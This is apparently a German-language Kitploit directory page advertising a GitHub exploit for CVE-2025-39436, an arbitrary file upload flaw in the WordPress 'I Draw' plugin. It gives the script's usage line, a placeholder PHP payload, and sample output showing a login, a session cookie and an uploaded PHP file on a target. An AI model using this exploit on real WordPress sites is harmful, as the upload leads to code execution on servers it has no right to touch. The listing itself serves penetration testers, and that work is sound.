Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-39436 — WordPress I Draw Plugin <= 1.0 ist anfällig für das Hochladen beliebiger Dateien. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-39436
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-39436

CVE-2025-39436

WordPress I Draw Plugin <= 1.0 ist anfällig für das Hochladen beliebiger Dateien.

Repository anzeigen
32vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 WordPress-Plugin-Exploit: CVE-2025-39436

📝 Beschreibung

Im WordPress-Plugin "I Draw" besteht eine Schwachstelle für uneingeschränktes Hochladen von Dateien mit gefährlichem Typ. Dieser Exploit ermöglicht es Angreifern, bösartige Dateien ohne Einschränkung hochzuladen. Das Problem betrifft I Draw Versionen bis 1.0.


🛠️ Exploit-Details

Der Exploit nutzt die Datei-Upload-Funktionalität des Plugins, um eine PHP-Nutzlast auszuführen. Nachfolgend die verwendete Standard-Nutzlast:

root@kitploit:~
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"

🚀 Nutzung

root@kitploit:~
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target website URL
  -un, --username USERNAME
                        Username
  -p, --password PASSWORD

💻 Beispiel für Skriptausgabe

root@kitploit:~
[✅] Login successful.
[🍪] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] File uploaded successfully:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php

⚠️ Haftungsausschluss

Dieses Skript wird nur zu Bildungszwecken bereitgestellt. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diesen Exploit verursacht werden. Die Nutzung erfolgt auf eigenes Risiko.


Von: Nxploited ( Khaled Alenazi )

Tool herunterladen